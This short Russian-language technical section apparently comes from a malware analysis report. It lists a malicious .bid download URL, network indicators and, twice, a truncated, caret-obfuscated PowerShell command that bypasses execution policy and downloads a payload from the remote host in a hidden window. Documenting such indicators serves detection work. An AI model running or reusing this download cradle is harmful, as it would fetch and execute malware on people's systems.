Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OW^eRSH^e^l^L.eXe^ ^-^ex^ECuTi^o^N^POlIcY^ By^PasS -N^o^PRo^fiL^E -^wINdows^TYLe ^HI^DDEN^ (N^EW^-O^bj^eCt sYsT^EM.NE^t^.w^ebcLI^e^n^T).^D^o^W^N^LoAD^F^i^le^('http://ase...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "P^OW^eRSH^e^l^L.eXe^ ^-^ex^ECuTi^o^N^POlIcY^ By^PasS -N^o^PRo^fiL^E -^wINdows^TYLe ^HI^DDEN^ (N^EW^-O^bj^eCt sYsT^EM.NE^t^.w^ebcLI^e^n^T).^D^o^W^N^LoAD^F^i^le^('http://ase...' (со скрытым окном)